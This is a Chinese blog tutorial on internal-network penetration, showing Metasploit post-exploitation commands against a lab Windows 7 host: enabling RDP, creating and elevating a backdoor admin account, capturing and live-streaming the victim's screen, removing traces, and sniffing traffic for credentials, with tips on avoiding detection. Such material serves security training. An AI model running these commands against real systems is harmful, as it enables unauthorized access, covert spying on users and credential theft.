当前位置:网站首页>内网渗透之内网信息收集(二)
内网渗透之内网信息收集(二)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
05打开并连接3389
查看3389端口的开放情况

开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

可以利用该命令在目标机器上添加用户:
run getgui -u admin -p [email protected](一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)

远程连接桌面
rdesktop -u username -p password ip

yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)

登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)

查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)

use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)

删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- 【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
- js判断对象是否是数组的几种方式
- How to turn wechat applet into uniapp
- . How to upload XMIND files to Jinshan document sharing online editing?
- QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
- 【数据库 三大范式】一看就懂
- 搭建域环境(win)
- Relationship between hashcode() and equals()
- 4. Branch statements and loop statements
- Experiment 7 use of common classes
猜你喜欢

Attach the simplified sample database to the SQLSERVER database instance

QT meta object qmetaobject indexofslot and other functions to obtain class methods attention

Record a penetration of the cat shed from outside to inside. Library operation extraction flag

How to turn wechat applet into uniapp

【VMware异常问题】问题分析&解决办法

Strengthen basic learning records

3. Input and output functions (printf, scanf, getchar and putchar)

网络基础之路由详解

Mixlab unbounded community white paper officially released

Record once, modify password logic vulnerability actual combat
随机推荐
Meituan dynamic thread pool practice ideas, open source
Safe driving skills on ice and snow roads
[insert, modify and delete data in the headsong educator data table]
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
强化学习基础记录
【educoder数据库实验 索引】
7-9 make house number 3.0 (PTA program design)
Strengthen basic learning records
Attach the simplified sample database to the SQLSERVER database instance
强化学习基础记录
[MySQL table structure and integrity constraint modification (Alter)]
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
实验五 类和对象
How to understand the difference between technical thinking and business thinking in Bi?
Nuxtjs快速上手(Nuxt2)
7-7 7003 组合锁(PTA程序设计)
Interpretation of iterator related "itertools" module usage
7-8 7104 Joseph problem (PTA program design)
Experiment 4 array
List and data frame of R language experiment III